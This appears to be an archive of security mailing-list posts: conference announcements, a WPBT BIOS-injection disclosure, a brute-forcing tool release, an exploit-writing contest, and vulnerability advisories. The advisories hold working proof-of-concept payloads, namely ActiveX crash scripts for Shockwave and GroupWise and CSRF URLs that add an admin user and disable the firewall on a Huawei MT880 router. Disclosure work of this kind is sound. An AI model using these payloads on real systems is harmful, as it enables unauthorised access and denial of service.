Re: Windows Platform Binary Table (WPBT) - BIOS PE backdoor
Some more info https://www.us-cert.gov/ncas/current-activity/2015/08/12/Lenovo-Service-Engine-LSE-BIOS-Vulnerability 2015-08-12 14:44 GMT+03:00 Kevin Beaumont kevin.beaum...@gmail.com: PRECURSOR There will be debate about if this is a vulnerability. It affects a majority of user PCs -- including all Enterprise editions of Windows, there is no way to disable it, and allows direct code execution into secure boot sequences. I believe it is worth discussing. SCOPE Microsoft documented a feature in Windows 8 and above called Windows Platform Binary Table. Up until two days ago, this was a single Word document not referenced elsewhere on Google: http://webcache.googleusercontent.com/search?q=cache:H-SSYRAB0usJ:download.microsoft.com/download/8/A/2/8A2FB72D-9B96-4E2D-A559-4A27CF905A80/windows-platform-binary-table.docx+cd=1hl=enct=clnkgl=us This feature allows a BIOS to deliver the payload of an executable, which is run in memory, silently, each time a system is booted. The executable code is run under under Session Manager context (i.e. SYSTEM). This technique is being used by Lenovo and HP to silently deliver software, even after systems are completely wiped. This issue came to light in this forum thread: http://arstechnica.com/civis/viewtopic.php?p=29551819#p29551819 Additionally, the code is injected and executed in Windows after the Windows kernel has booted - meaning hard drives are accessible. In a HP document - http://h10032.www1.hp.com/ctg/Manual/c03857419.pdf page 18 - they reference they use Windows Platform Binary Table to inject their code into encrypted systems (e.g. BitLocker) (). MITIGATIONS It is not possible to disable this functionality. If you can gain access to the BIOS, you can inject code into the Windows boot sequence using the documentation linked above. The BIOS delivered PE code is not countersigned by Microsoft. Microsoft say: If partners intentionally or unintentionally introduce malware or unwanted software though the WPBT, Microsoft may remove such software through the use of antimalware software. Software that is determined to be malicious may be subject to immediate removal without notice. However, you are relying on Microsoft being aware of attacks. Since the code is executed in memory and not written to disk prior to activation, Windows Defender does not even scan the executed code.
FRHACK01 DVDs
Hi list, FRHACK01, International IT Security Conference, was held in Besancon, France - http://www.frhack.org FRHACK was not commercial, but technical. We decided to sell DVDs of the conference to cover our expenses. If anyone has a problem with this, with FRHACK or with me = he's invited to contact me directly and we should be able to speak about it in an eyes2eyes way, like men. If u just want to flame on your blog, just go in hell. Anyway, so here it is, the first 2 DVDs of FRHACK available for FREE: http://www.frhack.org/frhack01_dvd01.iso http://www.frhack.org/frhack01_stallman.avi Enjoy /JA RIP mil I never forget my brothers
Re: FRHACK01 DVDs
New CC number, have to update account information, blablabla... SORRY Here it is for now: https://free-security.org/frhack/frhack01_dvd01.iso https://free-security.org/frhack/frhack01_stallman.avi /JA C0m3 b...@ck s00n mi1 ;p
Re: FRHACK01 Slides are online
Permissions have been fixed, you should be able to access to all the papers now. Sorry /JA Le mardi 06 octobre 2009 à 10:35 +0200, Jerome Athias a écrit : Hi there, FRHACK01 (www.frhack.org) is over and we want to thanks everyone for participation, and really hope that you appreciated this 1st edition and had some fun in Besancon, France. [1] You can find the slides of the speakers here: http://www.frhack.org/slides/FRHACK2009_Advanced-Payloads_BSDaemon.ppt http://www.frhack.org/slides/FRHACK2009_Attacking-SS7_Langlois.pdf http://www.frhack.org/slides/FRHACK2009_Audit_Gamache.ppt http://www.frhack.org/slides/FRHACK2009_Business-Logic-Flaws_Georgiadis.ppt http://www.frhack.org/slides/FRHACK2009_HackerSpaces_tmplab.pdf http://www.frhack.org/slides/FRHACK2009_Hacking-Intranets_Cerrudo.ppt http://www.frhack.org/slides/FRHACK2009_IpMorph_Prigent.pdf http://www.frhack.org/slides/FRHACK2009_JA.odp http://www.frhack.org/slides/FRHACK2009_Kerouanton.pdf http://www.frhack.org/slides/FRHACK2009_Massive-Activities_Kachalin.pdf http://www.frhack.org/slides/FRHACK2009_Mchiriac.ppt http://www.frhack.org/slides/FRHACK2009_MITM-Keylogging_p3Lo.ppt http://www.frhack.org/slides/FRHACK2009_Oechslin.pdf http://www.frhack.org/slides/FRHACK2009_Sarraute.pdf http://www.frhack.org/slides/FRHACK2009_UC-Security_VIPER.pptx http://www.frhack.org/slides/FRHACK2009_WAF_Web-Application-Firewalls_Gioria.pdf PS1: We'll upload missing ones in a near future PS2: Video recordings of the conferences should be available in a couple of weeks [2] PS3: I like to break some hashes with it [1] Public pictures and videos of FRHACK01: http://bruno.kerouanton.net/blog/2009/09/06/frhack-in-live/ http://picasaweb.google.ru/A.Kachalin/FrHack1st# http://attackvector.lescigales.org/2009/09/14/frhack01-2009-resume-nothing-is-secure-but-we-can-try-together/ http://bughira.wordpress.com/2009/09/24/oatv2-0-in-frhack-01/ http://info.francetelevisions.fr/video-info/index-fr.php?id-video=cafe_HD_1200_besancon_midipile_070909_070920091222_F3 http://www.net-security.org/secworld.php?id=8059 [2] You can purchase behind the scene professional videos here: http://www.frhack.org/videos/frhack_videos_en.pdf french: http://www.frhack.org/videos/frhack_videos_fr.pdf Thanks again! /JA
FRHACK01 Slides are online
Hi there, FRHACK01 (www.frhack.org) is over and we want to thanks everyone for participation, and really hope that you appreciated this 1st edition and had some fun in Besancon, France. [1] You can find the slides of the speakers here: http://www.frhack.org/slides/FRHACK2009_Advanced-Payloads_BSDaemon.ppt http://www.frhack.org/slides/FRHACK2009_Attacking-SS7_Langlois.pdf http://www.frhack.org/slides/FRHACK2009_Audit_Gamache.ppt http://www.frhack.org/slides/FRHACK2009_Business-Logic-Flaws_Georgiadis.ppt http://www.frhack.org/slides/FRHACK2009_HackerSpaces_tmplab.pdf http://www.frhack.org/slides/FRHACK2009_Hacking-Intranets_Cerrudo.ppt http://www.frhack.org/slides/FRHACK2009_IpMorph_Prigent.pdf http://www.frhack.org/slides/FRHACK2009_JA.odp http://www.frhack.org/slides/FRHACK2009_Kerouanton.pdf http://www.frhack.org/slides/FRHACK2009_Massive-Activities_Kachalin.pdf http://www.frhack.org/slides/FRHACK2009_Mchiriac.ppt http://www.frhack.org/slides/FRHACK2009_MITM-Keylogging_p3Lo.ppt http://www.frhack.org/slides/FRHACK2009_Oechslin.pdf http://www.frhack.org/slides/FRHACK2009_Sarraute.pdf http://www.frhack.org/slides/FRHACK2009_UC-Security_VIPER.pptx http://www.frhack.org/slides/FRHACK2009_WAF_Web-Application-Firewalls_Gioria.pdf PS1: We'll upload missing ones in a near future PS2: Video recordings of the conferences should be available in a couple of weeks [2] PS3: I like to break some hashes with it [1] Public pictures and videos of FRHACK01: http://bruno.kerouanton.net/blog/2009/09/06/frhack-in-live/ http://picasaweb.google.ru/A.Kachalin/FrHack1st# http://attackvector.lescigales.org/2009/09/14/frhack01-2009-resume-nothing-is-secure-but-we-can-try-together/ http://bughira.wordpress.com/2009/09/24/oatv2-0-in-frhack-01/ http://info.francetelevisions.fr/video-info/index-fr.php?id-video=cafe_HD_1200_besancon_midipile_070909_070920091222_F3 http://www.net-security.org/secworld.php?id=8059 [2] You can purchase behind the scene professional videos here: http://www.frhack.org/videos/frhack_videos_en.pdf french: http://www.frhack.org/videos/frhack_videos_fr.pdf Thanks again! /JA -- NO CISSP, NO CISM, NO CHS-III, NO ISSAP, NO ISSPCS, NO ITILp, NO CGEIT, NO MCSE, NO MCT, NO ISO27001, NO OSCP, NO IACRB CPT, NO CEPT, NO GPEN, NO CCNP, NO CCDP, NO CCIP, NO CCSP, NO CCVP NOthing Sorry! I just have a brain and two hands.
Multiple Vulnerabilities
Author: Francis Provencher (Protek Research Lab's)
#
Application: Adobe ShockWave Player (11.5.1.601)
Platforms:Windows XP Professional French SP2 and SP3
crash:IE 6.0.2900.2180
Exploitation: remote DoS
Date: 2009-08-24
Author: Francis Provencher (Protek Research Lab's)
#
1) Introduction
2) Technical details and bug
3) The Code
#
===
1) Introduction
===
Over 450 million Internet-enabled desktops have installed Adobe Shockwave
Player.
These people now have access to some of the best the Web has to offer -
including dazzling 3D games and entertainment,
interactive product demonstrations, and online learning applications. Shockwave
Player displays Web content that has been created by Adobe Director.
#
2) Technical details
Name: SwDir.dll
Ver.: 11.5.1.601
CLSID: {233C1507-6A77-46A4-9443-F871F945D258}
(d40.b20): Stack overflow - code c0fd
eax=00305004 ebx=0003 ecx=00032f80 edx=0040 esi=09ae0024 edi=0042
eip=69214965 esp=0012df78 ebp=0012df8c iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs= efl=00010202
#
===
3) The Code
===
Proof of concept DoS code;
html
object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258'
id='ShockW'/object
script language='vbscript'
argCount = 1
arg1=String(2097152, A)
ShockW.PlayerVersion = arg1
/script
#
#
Application: Novell Groupwise Client 7.0.3.1294
Platforms:Windows XP Professional French SP2 and SP3
crash:IE 6.0.2900.2180
Exploitation: remote DoS
Date: 2009-08-24
Author: Francis Provencher (Protek Research Lab's)
#
1) Introduction
2) Technical details and bug
3) The Code
#
===
1) Introduction
===
GroupWise is a messaging and collaborative software platform from Novell that
supports email, calendaring, personal information management, instant
messaging, and document management. The platform consists of the client
software, which is available for Windows, Mac OS X, and Linux, and the server
software, which is supported on Windows Server, Netware, and Linux. The latest
generation of the platform is GroupWise 8, which was launched in 2008.
#
2) Technical details
Name: gxmim1.dll
Ver.: 7.0.3.1294
CLSID: {9796BED2-C1CF-11D2-9384-0008C7396667}
#
===
3) The Code
===
Proof of concept DoS code;
html
object classid='clsid:9796BED2-C1CF-11D2-9384-0008C7396667'
id='GWComposeCtl'/object
script language='vbscript'
argCount = 1
arg1=AAA
GWComposeCtl.SetFontFace arg1
/script
#
#
Application: EasyMail Quicksoft 6.0.2.0
Platforms:Windows XP Professional French SP2
crash:IE 6.0.2900.2180
Exploitation: remote Code Execution
Date: 2009-08-24
Author: Francis Provencher (Protek Research Lab's)
#
1) Introduction
2) Technical details and bug
3) The Code
#
===
1) Introduction
===
Create, send, download, parse, print and store internet email messages in your
classic windows application. Designed for Visual Basic, ASP, C++, Delphi,
ColdFusion, PowerBuilder, Access and other development environments. COM or
standard DLL interfaces. This is the software that processes hundreds of
millions of email messages on the Internet every day.
Re: FRHACK OS v1 alpha1 released
I just would like to clarify that, unfortunately, I (again) did a mistake. Please forget the name FRHACK OS forever, and call it, if you want, Back Track FRHACK Edition. I apologize for this (too fast, too bad). All credits for Back Track are (and must to be) due to the remote-exploit.org guys ( http://remote-exploit.org ). I salute them for their awesome work and apologize again. So now, shame on me, flame or continue what you're doing. Cheers /JA
FRHACK OS v1 alpha1 released
Hi list, We're looking for betatesters for FRHACK OS. yes another pentesting live dvd == Overview == FRHACK OS is an updated/modified version of the latest BackTrack 4 iso available for download ( http://www.remote-exploit.org/backtrack.html ) We have updated and added tons of tools. == Quick view == flex gcc-4.2 libgtk2.0-dev libexpect-perl libqt4-opengl-dev # Java5 - Java6 sun-java6-jre sun-java6-plugin spoonwep-wpa-rc3.deb fakeap-0.3.2 svn airgraph-ng svn airoscript wget http://sid.rstack.org/code/wifitap.tgz; WEPCrack-0.1.0 # Charon wifi-radar-2.0.s05 gpsdrive ssidsniff-0.53 zulu-0.1 aphopper-0.3 wispy-tools-2007-svn airsnort-0.2.7e.tar.gz mdk3-v5.tar.bz2 wepbuster-1.0_beta_0.6 fierce jbrofuzz-jar-15 wfuzz-1.4 bluemaho_v090417 bluescan_1.0.6 bluesnarfer ghettotooth.pl bt_audit-0.1.1 fatback-1.3.tar.gz pasco_20040505_1 unhide_20080519-2 memdump-1.01 allin1-0.4.tar.gz tor-0.2.1.19 privoxy-3.0.8-stable-src ophcrack-3.3.1 vncrack_src-1.21 TFTP-bruteforce DNSBruteforce svn kalgecin fuzzgrind_090622 origami-1.0.0-beta0 MetaScan.rb complemento-0.7 middler-1.0 ... A new version (coming with bug fixes, included rainbow tables, wordlists, extras (babes excluded), etc.) will be available for FRHACK 01, so you'll be able to use it for the FRHACK Wargame. http://www.frhack.org == Download == https://www.securinfos.info/frhack/frhack-os.iso 1.4 Gb MD5 56c3b8ca9aa470cdf85e9589723b0a0b SHA15bc07858c31e667fa82877fe72d1f61f67b37e3f Enjoy, and thanks for feedbacks (off-list) /JA Greetings fly to Regis Senet (JA-PSI.fr)
FRHACK ITSec Conf DVDs and Live Streams
Hi list, That's the final countdown for FRHACK 01, IT Security Conference, by hackers - for hackers, France, September 7th-8th 2009. http://www.frhack.org Due to demand, the FRHACK staff decided to provide DVDs and a limited amount of accounts to assist FRHACK via live streams. So, if you can't travel to FRHACK, please register asap on: http://www.mediatux.com/purchasefrhack.php Notes: - tracks #1 will be available for sure, tracks #2 should be but we can't confirm it today - some talks will be freely available for download after FRHACK, like mine and Richard Stallman's one. Happy Hacking! /JA
Multiple Flaws in Huawei SmartAX MT880 [was: Multiple Flaws in Huawei D100]
Description: Huawei MT880 is a device offered by the algerian telecom operator - FAWRI, to provide ADSL Internet connexion and it's already widely in use. Overview: Huawei MT880 firmware and its default configuration has flaws, which allows LAN users to gain unauthorized full access to device. Here are just limited PoCs. Possible XSRFs: Adding an administrator user: http://192.168.1.1/Action?user_id=jeromepriv=1pass1=jeromepass2=jeromeid=70 Disabling firewall/anti-DoS... features: http://192.168.1.1/Action?blacklisting_status=1bl_list=10attack_status=0dos_status=0id=42max_tcp=25max_icmp=25max_host=70 Adding a MAC address to the whitelist: http://192.168.1.1/Action?insrcmac66=123456789123inblocksrcmac66=1insrcmac67=inblocksrcmac67=1insrcmac68=inblocksrcmac68=1insrcmac69=inblocksrcmac69=1insrcmac70=inblocksrcmac70=1insrcmac71=inblocksrcmac71=1insrcmac72=inblocksrcmac72=1insrcmac73=inblocksrcmac73=1insrcmac74=inblocksrcmac74=1insrcmac75=inblocksrcmac75=1insrcmac76=inblocksrcmac76=1insrcmac77=inblocksrcmac77=1insrcmac78=inblocksrcmac78=1insrcmac79=inblocksrcmac79=1insrcmac80=inblocksrcmac80=1insrcmac81=inblocksrcmac81=1id=104 Adding an IP address allowed by the firewall: http://192.168.1.1/Action?ip_1=192ip_2=168ip_3=1ip_4=2mask_1=255mask_2=255mask_3=255mask_4=255gateway_1=192gateway_2=168gateway_3=1gateway_4=1id=7 Over flaws are not covered in this advisory. Cheers /JA Jerome Athias JA-PSI, French IT Security Company http://www.ja-psi.fr Are you ready to FRHACK? International, Technical IT Security Conferences Trainings, September 7-11th, France http://www.frhack.org
FRHACK List of Talks and Speakers released
### FRHACK: By Hackers, For Hackers! http://www.frhack.org ### + + FRHACK 01 + September 7-8, 2009, at the Great Kursaal Hall of Besançon, France. + http://www.frhack.org + Last chance to register for FRHACK's Trainings Workshops. Hurry up! http://www.frhack.org/frhack-trainings.php - + FRHACK List of Talks and Speakers + http://www.frhack.org/schedule.php - # Invited speakers # Free Software in Ethics and in Practice - Richard Matthew Stallman (RMS) TBA - David Hulton (h1kari) TBA - Rodrigo Rubira Branco (BSDaemon) TBA (-1 day talk announcement) - Cesar Cerrudo Note: Unfortunately, some previously invited speakers will not be available for FRHACK 2009. # Selected speakers # Social Engineering, Hacking brains - Bruno Kerouanton (Switzerland) Reverse engineering and cryptographic errors - Philippe Oechslin (Switzerland) All browsers MITM keylogging on remote - p3lo (France) GSM/GPRS/UMTS (in)security, Forensic on GSM mobiles phone - PaTa (Spain) Lockpicking, How to open/break all (back)doors - Alexandre Triffault (France) Wireless Sensor Networking as an Asset and a Liability - Travis Goodspeed (USA) HostileWRT - Abusing Embedded Hardware Platforms for Covert Operations - HostileWRT Team (France) Mystification de la prise d'empreinte (OS Fingerprinting Defeating) - Guillaume Prigent (France) Web Application Firewalls - Sebastien Gioria (OWASP France) UC Security (Unified Communications Security) - Abhijeet Hatekar (Sipera Systems) (India) SS7 - Philippe Langlois (France) Building Hackerspaces Everywhere - Philippe Langlois (France) Virtual Machines (in)security and rootkits - Nguyen Anh Quynh (Japan) Memory forensic and incident response for live virtual machine (VM) - Nguyen Anh Quynh (Japan) Internet Marketing vs. Web Security: Guide to Extreme Black Hat Online Profits! - Anselmus Ricky (Indonesia) New Algorithms for Attack Planning - Carlos Sarraute (CORE Security) (Argentina) Asterisk Resource Exhaustion DoS: Don’t let the fuzz get you! - Blake Cornell (USA) Massive malicious activities (malware spreading, DDoS attacks) - Alexey Kachalin (Russia) OpenVAS - Open Vulnerability Scanning - Vlatko Kosturjak (Croatia) Automated malware analysis, forensic analysis, anti-virus technology - Mihai Chiriac (Bitdefender) (Romania) Flash Remote Hacking - Jon Rose (USA) Auditing and securing PHP applications - Philippe Gamache (Québec, Canada) ... [ - Introduction - ] FRHACK is the First International IT Security Conference, by hackers - for hackers, in France! FRHACK is not commercial - but - highly technical. Target Audience: Security Officers, Security Professionals and Product Vendors, IT Decision Makers, Policy Makers, Security-, Network-, and Firewall Administrators, Teachers, Academic Researchers and Software Developers. Conference will be held in Besançon - EU, East of France, closer to Switzerland, and aims to get together industry, government, academia and underground hackers to share knowledge and leading-edge ideas about information security and everything related to it. FRHACK will feature national and international speakers and attendees with a wide range of skills. The atmosphere is favorable to present all facets of computer security subject and will be a great opportunity to network with like-minded people and enthusiasts. [ - The venue - ] FRHACK 01 (1st edition) will take place at the Great Kursaal Hall of Besançon with capacity for up to 1400 people. About Besançon: http://en.wikipedia.org/wiki/Besan%C3%A7on Please register to our RSS to stay tuned: http://www.frhack.org/frhack.xml Linkedin group: http://www.linkedin.com/groups?gid=1613377 Note: We will try to organize an Hacking from Camping camp :p [ - Information for sponsors - ] - If you can provide materials, devices, goodies and money, please contact us at: frhack-spon...@frhack.org Thanks and see you soon at FHRACK! Jerome Athias, Founder, Chairman, Program Coordinator /JA
FRHACK 2009 Final Call For Papers extended
FRHACK 01, Besançon - France 2009 September 7-8 9-11 http://www.frhack.org by hackers, for hackers ## Final Call For Papers ## The Call For Papers for FRHACK 2009 is extended The deadline for submissions is the 30th of June. For more information, please visit http://frhack.org/cfp.php Registration for Trainings/Workshops and the Conference is open http://frhack.org/register.php LinkedIn group: http://www.linkedin.com/groups?gid=1613377 See you soon for FRHACK! Jerome Athias Main organizer Do you like good wine, french bread food, strikes and the french kiss? If so, you will love FRHACK!
[CFP] FRHACK 2nd Call For Papers
- Hardware hacking, embedded systems and other electronic devices - Mobile devices exploitation, Symbian, P2K and bluetooth technologies - Security aspects in SCADA, industrial environments and obscure networks [ - Important dates - ] Conference and trainings 20090907-08: FRHACK 1st edition 20090909-10: FRHACK trainings Please register to our RSS to stay tuned: http://www.frhack.org/frhack.xml Linkedin group: http://www.linkedin.com/groups?gid=1613377 Deadline and submissions - Deadline for proposal submissions: 20090601 - Deadline for slides submissions: 20090701 - Notification of acceptance or rejection: 20090714 * E-mail for proposal submissions: c...@frhack.org * Make sure to provide along with your submission the following details: - Speaker name and/or nickname, address, e-mail, phone number and general contact information - A brief but informative description about your talk - Short biography of the presenter, including organization, company and affiliations - Estimated time-length of presentation and language - General topic of the speech (eg.: network security, secure programming, computer forensics, etc.) - Any other technical requirements for your lecture - Whether you need visa to enter France or not Speakers will be allocated 50 minutes of presentation time, although, if needed, we can extend the presentation length if requested in advance. Preferrable file format for papers and slides are both PDF and also ODT/PPT for slides. Speakers are asked to hand in slides used in their lectures. PLEASE NOTE: Bear in mind no sales pitches will be allowed. If your presentation involves advertisement of products or services please do not submit. [ - Information for speakers - ] Please note that it's our first edition, and so we are looking for sponsors to cover conference's expenses. Speakers' privileges are: - FRHACK staff can guarantee and we will provide accommodation for 3 nights: - One economy class return-ticket for each non-resident speaker - For each resident speaker we will cover travel expenses - Free pass to the conference for you and a friend - Speaker activities during, before, and after the conference - Speaker After-Party with tons of fun, drinks... [ - Information for instructors - ] - 50% of the net profit of the class - 2 nights of accommodation during the trainings - Free pass to the conference - Speaker activities during, before, and after the conference - Speaker After-Party with tons of fun, drinks... [ - Information for sponsors - ] - If you can provide or offer materials, devices, goodies and money, please contact us at: frhack-spon...@frhack.org [ - Information for attendees - ] - Invited speakers: http://frhack.org/conference.html Joanna Rutkowska, Richard Matthew Stallman, David Hulton, Cesar Cerrudo, Brett Moore, Sebastian Muñiz and Rodrigo Rubira Branco were invited to speak at FRHACK - Registration: http://frhack.org/register.html - Events: http://frhack.org/events.html [ - Other information - ] - For further information please check out our web site http://www.frhack.org (and nowhere else) It will be updated with everything regarding the conference. - If you have questions, want to send us additional material, or have problems, feel free to contact us at: frh...@frhack.org Thanks and see you soon at FHRACK! Jerome Athias, Founder, Chairman, Program Coordinator /JA
Re: [Suspected Spam]Security Assessment of the Internet Protocol the IETF
Hi, I still not have read all your paper, but my first word is congratulations! That's an hard job. Since a quick search didn't give a result for it, and maybe others could be interested: The AVISPA (Automated Validation of Internet Security Protocols and Applications) project aims at developing a push-button, industrial-strength technology for the analysis of large-scale Internet security-sensitive protocols and applications. This website contains all relevant information about AVISPA for project members, interested third parties and scientists worldwide. http://www.avispa-project.org/ My 2 cents for now /JA Fernando Gont a écrit : Folks, In August 2008 the UK CPNI (United Kingdom's Centre for the Protection of National Infrastructure) published the document Security Assessment of the Internet Protocol. The motivation of the aforementioned document is explained in the Preface of the document itself. (The paper is available at: http://www.cpni.gov.uk/Docs/InternetProtocol.pdf ) Once the paper was published by CPNI, I produced an IETF Internet-Draft version of the same paper, with the intent of having the IETF publish recommendations and/or update the specifications where necessary. This IETF Internet-Draft is available at: http://www.gont.com.ar/drafts/ip-security/index.html (and of course it's also available at the IETF I-D repository). The Internet-Draft I published was aimed at the OPSEC WG. And the Working Group is right now deciding whether to accept this document as a WG item. This is certainly a critical step. Having the OPSEC WG accept this document as a WG item would guarantee to some extent that the IETF will do something about all this, and would also somehow set a precedent in updating the specifications of core protocols and/or providing advice on security aspects of them. The call for consensus is available at: http://www.ietf.org/mail-archive/web/opsec/current/msg00373.html . You can voice your opinion on the relevant mailing-list sending an e-mail to op...@ietf.org . You don't need to subscribe to the mailing list to post a message (although your message will be held for moderator approval before it is distributed to the list members). The deadline for posting your opinion is January 9th (next Friday). Thanks so much! Kind regards, Fernando Gont -- Fernando Gont e-mail: ferna...@gont.com.ar || fg...@acm.org PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1
MSFXDC Metasploit eXploits Development Contest
Hi there, MSFXDC (MetaSploit Framework eXploits Development Contest) is a challenge where the main goal is to code the largest number of new Metasploit Framework exploits modules. https://www.securinfos.info/metasploit/msfxdc.php Your mission, if you choose to accept it, is to code new exploits modules for the Metasploit Framework (latest 3.x version). Exploits modules must be new regarding the current Metasploit Framework SVN repository content. (http://metasploit.com/svn/framework3/trunk/ Updated to revision 6062) (Backup: https://www.securinfos.info/metasploit/framework-trunk-snapshot-6062.tar.gz) Exploits modules can be new fresh sploits or old exploits ported to the MSF v3.x. (ie: stolen from www.milw0rm.com or MSF v2 modules still not ported to v3 http://metasploit.com/svn/framework3/trunk/documentation/metasploit2/exploits.txt ) NOTE: Contesters can take advantage of the MSF-eXploit Builder to achieve this goal ( https://www.securinfos.info/metasploit/MSF_XB.php ) *** MSFXDC STARTS NOW! *** and you can submit your stuff to: msf...@ja-psi.com until February 1st 2009 00H00 GMT Winner prize: * Euros 150 * 1 Free VIP Ticket for the FRHACK conference ( http://www.frhack.org ) Points counter: Working DoS module gives you 1 point Working web app module gives you 2 points Working local/remote Exploit gives you 3 points New fresh exploit (not published before) gives you + 2 points Classification and all submitted exploits will be publicly provided on: https://www.securinfos.info/metasploit/msfxdc.php (including the name/nickname/credits of the coder) May The MSForce Be With You! /JA MSFXDC is organized by JA-PSI, French IT Security Company ( http://www.ja-psi.com ). Metasploit ™ is a registered trademark. ( http://www.metasploit.com )
FreeRainbowTables.com has changed generation platform
FreeRainbowTables.com has recently moved to the BOINC platform for generation of rainbow tables. We are happy to share the news with our users, and we hope you will continue to help us generate more rainbow tables. It is easy to htlp us in the generation of high quality rainbow tables. Simply visit our download page ( http://www.freerainbowtables.com/en/download/ ) and follow the instructions. Thanks /JA
[CFP] FRHACK 01 Call For Papers (save the dates!)
, though two international airports, EuroAirport Basel-Mulhouse-Freiburg and Lyon Saint-Exupéry International Airport, can be reached in about 2 hours. [ - Topics - ] TFT gives preference to lectures with practical demonstration. The conference staff will try to provide every equipment needed for the presentation in the case the author cannot provide them. The following topics include, but are not limited to: - Rootkits - Cryptography - Reverse engineering - Penetration testing - Web application security - Exploit development techniques - Internet, privacy and Big Brother - Telecom security and phone phreaking - Fuzzing and application security test - Security in Wi-Fi and VoIP environments - Information warfare and industrial espionage - Denial of service attacks and/or countermeasures - Analysis of virus, worms and all sorts of malwares - Technical approach to alternative operating systems - Techniques for development of secure software systems - Information about smartcard and RFID security and similars - Lockpicking, trashing, physical security and urban exploration - Hardware hacking, embedded systems and other electronic devices - Mobile devices exploitation, Symbian, P2K and bluetooth technologies - Security aspects in SCADA, industrial environments and obscure networks [ - Important dates - ] Conference and trainings 20090909-10: FRHACK trainings 20090907-08: FRHACK 1st edition Please register to our RSS to stay tuned: http://www.frhack.org/frhack.xml Deadline and submissions - Deadline for proposal submissions: 20090601 - Deadline for slides submissions: 20090701 - Notification of acceptance or rejection: 20090714 * E-mail for proposal submissions: [EMAIL PROTECTED] * Make sure to provide along with your submission the following details: - Speaker name and/or nickname, address, e-mail, phone number and general contact information - A brief but informative description about your talk - Short biography of the presenter, including organization, company and affiliations - Estimated time-length of presentation and language - General topic of the speech (eg.: network security, secure programming, computer forensics, etc.) - Any other technical requirements for your lecture - Whether you need visa to enter France or not Speakers will be allocated 50 minutes of presentation time, although, if needed, we can extend the presentation length if requested in advance. Preferrable file format for papers and slides are both PDF and also ODT/PPT for slides. Speakers are asked to hand in slides used in their lectures. PLEASE NOTE: Bear in mind no sales pitches will be allowed. If your presentation involves advertisement of products or services please do not submit. Furthermore, if your talk is just I found an awesome new technic but if you want it, just go in hell! = You're not welcome at FRHACK. [ - Information for speakers - ] Please note that it's our first edition, and so we are looking for sponsors to cover conference's expenses. Speakers' privileges are: - FRHACK staff can guarantee and we will provide accommodation for 3 nights: - For each non-resident speaker we hope to be able to cover travel expenses up to EURO 1500 - For each resident speaker we might be able to cover travel expenses - Free pass to the conference for you and a friend - Speaker activities during, before, and after the conference - Speaker After-Party with tons of fun, drinks and pretty girls [ - Information for instructors - ] - 50% of the net profit of the class - 2 nights of accommodation during the trainings - Free pass to the conference - Speaker activities during, before, and after the conference - Speaker After-Party with tons of fun, drinks and much more pretty girls [ - Information for sponsors - ] - If you can provide or offer materials, devices, goodies and money, please contact us at: [EMAIL PROTECTED] [ - Other information - ] - For further information please check out our web site http://www.frhack.org (and nowhere else) It will be updated with everything regarding the conference. - If you have questions, want to send us additional material, or have problems, feel free to contact us at: [EMAIL PROTECTED] Thanks and see you soon at FHRACK! Jerome Athias, Founder, Chairman, Program Coordinator /JA
HTTPBruteForcer released
Hi there, Due to the high number of requests, I have decided to release a fully usable version of HTTPBruteForcer, the free and easy to use web-based login forms' bruteforcer for Windows. HTTP BruteForcer is a tool designed for webmasters, programmers and websites administrators, or pentesters, to perfom a password strength check against a simple web login form. The old demo version was limited to a limited built-in wordlist. The new public version let you use a custom wordlist. ( https://www.securinfos.info/wordlists-dictionnaires.php or default passwords list https://www.securinfos.info/passwords-liste-mots-de-passe.html ) Download link and video demonstration: https://www.securinfos.info/english/httpb/HTTPBruteForcer.exe MD5: 0b1b50508d8a8fe68798a672515414ac SHA1: 41eda9a2c47f581b319f80211ea85f880793664b https://www.securinfos.info/outils-securite-hacking/httpbruteforcer_demo.swf.php -- IMPORTANT NOTES -- HTTPBruteForcer requires Internet Explorer (IE WebBrowser ActiveX) * This version has some limitations... * It doesn't include proxys' support * It doesn't support threads * It doesn't include the login-name bruteforce functionnality * Sources are not publicly available ... -- HOW TO PROTECT YOUR WEBSITE AGAINST BRUTE FORCE ATTACKS -- To protect your websites against such attacks, we'll release soon a detailed tutorial. Anyway, programmers *must* use: - Best programming practices (avoiding SQL Injection, XSS vulnerabilities, user-supplied inputs checks, etc) - Complexity for all and both users logins and passwords - Max counter of logins attempts - Captchas -- DISCLAIMER -- Use this software at your own risks. This software is provided AS IS and without warranty of any kind to the extend allowed by the applicable law. This software must only be used against your own website or with the agreement of the owner of a website. The author of this software does not warrant and does not assume any responsibility concerning the use of this software. The author can not be held responsible in case of illegal use of this software. The user is the only responsible from their use. The author would not be liable for any kind of damages, direct or indirect, resulting from a bad use of this software. Have a nice week-end. Best regards /JA HTTPBruteForcer is coded by Jerome Athias, webmaster of https://www.securinfos.info (One of the most famous french IT security related website ;p). HTTPBruteForcer is provided by JA-PSI, new French IT Security Company, France.
[Off-Topic] How I was busted. Story of a poor lonesome hacker
How I was busted. Story of a poor lonesome hacker Hi there, First I would like to say that this post is not technical, and so most of you should save time by not reading it. (I apologize for this.) Then, sorry for my bad english. My name is Jerome Athias, some could know me, some not, but that's not important. You should know that I don't like to speak about me or my private life. Anyway, I think that this story could be of interest. I was employed in a little company, in France (the name of this company will and must remain secret), as programmer analyst. Today, I've been laid off from this job. The main reason for that, between few others, is that I've installed, for educational purposes, unauthorized hacking tools (The Metasploit Framework, Tenable Nessus, Cain Abel... and Nmap) on my work computer. Like you, I care about security an privacy... I am an hacker (an enthusiastic home computer hobbyist - Wikipedia), definitely not a cracker. I love liberty, human rights and open mind. I am not claiming charity or money! (But I accept friendly mails and lawyers' assistance.) I just want you to avoid against Big Brother. Take care of yourself! Best regards /JA PS: Respectful of your religion (We are all human, all different, all equal.), I would like personally to salute the life of Soeur Emmanuelle. ( http://en.wikipedia.org/wiki/S%C5%93ur_Emmanuelle ) - RIP
e107 My_Gallery Plugin Arbitrary File Download Vulnerability
